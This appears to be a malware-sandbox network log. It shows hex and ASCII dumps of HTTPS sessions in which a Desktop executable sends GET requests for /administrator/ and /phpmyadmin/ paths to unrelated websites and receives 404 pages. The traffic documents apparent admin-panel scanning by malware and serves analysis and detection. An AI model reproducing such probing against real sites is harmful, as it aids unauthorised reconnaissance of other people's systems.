                                                                                                                                                                                                    2023-11-26 05:59:33 UTC443INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTServer: Apache/2.4.52 (Ubuntu)Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://talentius.com/wp-json/>; rel="https:
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC7749INData Raw: 31 65 63 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a
                                                                                                                                                                                                    Data Ascii: 1ecc<!DOCTYPE html><html lang="es-ES" class="no-js"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https:
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC141INData Raw: 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 77 69 64 67 65 74 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 31 31 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                                                                                    Data Ascii: cript type='text/javascript' src='https://talentius.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script><script type='text/javas
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC8192INData Raw: 31 66 66 38 0d 0a 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 6d 6f 75 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 31 31 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 64 72 61 67 67 61 62 6c 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 31 31 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72
                                                                                                                                                                                                    Data Ascii: 1ff8cript' src='https://talentius.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script><script type='text/javascript' src='https://talentius.com/wp-includes/js/jquery/ui/draggable.min.js?ver=1.11.4'></script><script type='text/javascript' sr
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC6INData Raw: 31 66 66 38 0d 0a
                                                                                                                                                                                                    Data Ascii: 1ff8
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC8184INData Raw: 2d 69 74 65 6d 2d 32 39 34 22 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 20 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 32 39 34 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 73 63 72 6f 6c 6c 22 20 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 6f 72 6d 61 63 69 6f 6e 2e 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 22 3e 41 43 43 45 53 4f 20 55 53 55 41 52 49 4f 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 09 09 09 09 09 3c 64 69 76 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 61 76 69 73 6f 2d 6c
                                                                                                                                                                                                    Data Ascii: -item-294" class="dropdown menu-item menu-item-type-custom menu-item-object-custom menu-item-294"><a class="page-scroll" target="_blank" href="http://formacion.talentius.com/">ACCESO USUARIO</a></li></ul><div><p><a href="http://talentius.com/aviso-l
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC997INData Raw: 33 64 39 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 62 69 7a 6f 6e 65 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 70 61 72 61 6c 6c 61 78 2d 31 2e 31 2e 33 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 62 69 7a 6f 6e 65 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 66 61 6e 63 79 62 6f 78 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74
                                                                                                                                                                                                    Data Ascii: 3d9<script type='text/javascript' src='https://talentius.com/wp-content/themes/bizone/assets/js/jquery.parallax-1.1.3.js'></script><script type='text/javascript' src='https://talentius.com/wp-content/themes/bizone/assets/js/jquery.fancybox.js'></script


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    106192.168.2.456702213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC183OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC461INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.ceuandalucia.es/wp-json/>; rel
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC6INData Raw: 32 33 30 34 0d 0a
                                                                                                                                                                                                    Data Ascii: 2304
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC4773INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 20 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 68 74 6d 6c 2d 6c 6f 61 64 69 6e 67 20 77 66 2d 61 63 74 69 76 65 20 69 65 20 6f 6c 64 2d 62 72 6f 77 73 65 72 20 6c 74 2d 69 65 31 30 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 20 72 65 73 70 6f 6e 73 69 76 65 22 20 69 74 65 6d 73 63 6f 70 65 3d 22 69 74 65 6d 73 63 6f 70 65 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js html-loading wf-active ie old-browser lt-ie10 lt-ie9 lt-ie8 lt-ie7 responsive" itemscope="itemscope" itemtype="http://schema.org/WebPage" lang="es" xmlns:og="http://opengraphprotocol.org/schema/"
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC4191INData Raw: 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 0a 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 77 69 64 74 68 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 61 63 6b
                                                                                                                                                                                                    Data Ascii: <style type="text/css">img.wp-smiley,img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 .07em !important;vertical-align: -0.1em !important;back
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC6INData Raw: 32 37 66 63 0d 0a
                                                                                                                                                                                                    Data Ascii: 27fc
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC5939INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6e 65 77 73 6c 65 74 74 65 72 2d 73 75 62 73 63 72 69 70 74 69 6f 6e 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6e 65 77 73 6c 65 74 74 65 72 2f 73 75 62 73 63 72 69 70 74 69 6f 6e 2f 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 35 2e 31 2e 38 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6d 6f 6f 76 65 5f 67 64 70 72 5f 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f
                                                                                                                                                                                                    Data Ascii: <link rel='stylesheet' id='newsletter-subscription-css' href='https://www.ceuandalucia.es/wp/wp-content/plugins/newsletter/subscription/style.css?ver=5.1.8' type='text/css' media='all' /><link rel='stylesheet' id='moove_gdpr_frontend-css' href='https:/
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC4297INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 68 65 6d 65 2d 62 6f 6f 74 73 74 72 61 70 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6e 76 69 73 69 6f 6e 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 3f 76 65 72 3d 32 2e 30 2e 39 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 68 65 6d 65 2d 63 68 69 6c 64 2d 66 72 6f 6e 74 65 6e 64 2d 73 74 79 6c 65 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77
                                                                                                                                                                                                    Data Ascii: <link rel='stylesheet' id='theme-bootstrap-css' href='https://www.ceuandalucia.es/wp/wp-content/themes/envision/lib/css/bootstrap.css?ver=2.0.9.3' type='text/css' media='all' /><link rel='stylesheet' id='theme-child-frontend-style-css' href='https://ww
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC6INData Raw: 35 62 66 35 0d 0a
                                                                                                                                                                                                    Data Ascii: 5bf5


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    107192.168.2.45722047.246.24.2114436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC169OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: wonka.cc
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC733INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 41 53 50 2e 4e 45 54 5f 53 65 73 73 69 6f 6e 49 64 3d 75 62 35 31 35 6e 70 66 6d 35 78 67 6e 72 63 33 68 62 67 31 79 7a 34 62 3b 20 70 61 74 68 3d 2f 3b 20 48 74 74 70 4f 6e 6c 79 3b
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: TengineContent-Type: text/html; charset=utf-8Content-Length: 103Connection: closeDate: Sun, 26 Nov 2023 05:59:33 GMTCache-Control: privateSet-Cookie: ASP.NET_SessionId=ub515npfm5xgnrc3hbg1yz4b; path=/; HttpOnly;
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC103INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 6e 77 7a 69 6d 67 2e 77 65 7a 68 61 6e 2e 6e 65 74 2f 73 74 61 74 69 63 2d 6a 73 2f 70 61 67 65 34 30 34 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script src='https://nwzimg.wezhan.net/static-js/page404.js'></script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    108192.168.2.45721954.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC262INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 76 61 72 79 3a 20 58 2d 46 6f 72 77 61 72 64 65 64 2d 50 72 6f 74 6f 63 6f 6c 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTServer: Apache/2.4.52 (Ubuntu)vary: X-Forwarded-Protocolcache-control: no-cache, no-store, must-revalidateConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=ut
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC7930INData Raw: 35 38 33 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 62 61 73 65 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61
                                                                                                                                                                                                    Data Ascii: 5836<!doctype html><html class="no-js" lang="en"> <head> <base href="https://ce-logic.com/">...[if lte IE 6]></base><![endif]--> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Pa
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC14658INData Raw: 52 65 73 65 61 72 63 68 20 53 6f 6c 75 74 69 6f 6e 73 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 65 64 75 63 61 74 69 6f 6e 61 6c 2d 73 6f 6c 75 74 69 6f 6e 73 2d 70 61 67 65 2f 6d 61 6b 65 72 73 70 61 63 65 2f 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 77 68 69 74 65 20 61 6c 69 67 6e 2d 63 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 62 74 6e 2d 74 65 78 74 22 3e 4d 61 6b 65 72 73 70 61 63 65 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: Research Solutions</p></a><a href="/educational-solutions-page/makerspace/" class="btn white align-c"><p class="btn-text">Makerspace</p></a></div></div></div>
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    109192.168.2.45729854.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC231OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://ce-logic.com/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC262INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 76 61 72 79 3a 20 58 2d 46 6f 72 77 61 72 64 65 64 2d 50 72 6f 74 6f 63 6f 6c 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTServer: Apache/2.4.52 (Ubuntu)vary: X-Forwarded-Protocolcache-control: no-cache, no-store, must-revalidateConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=ut
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC7930INData Raw: 35 38 33 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 62 61 73 65 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61
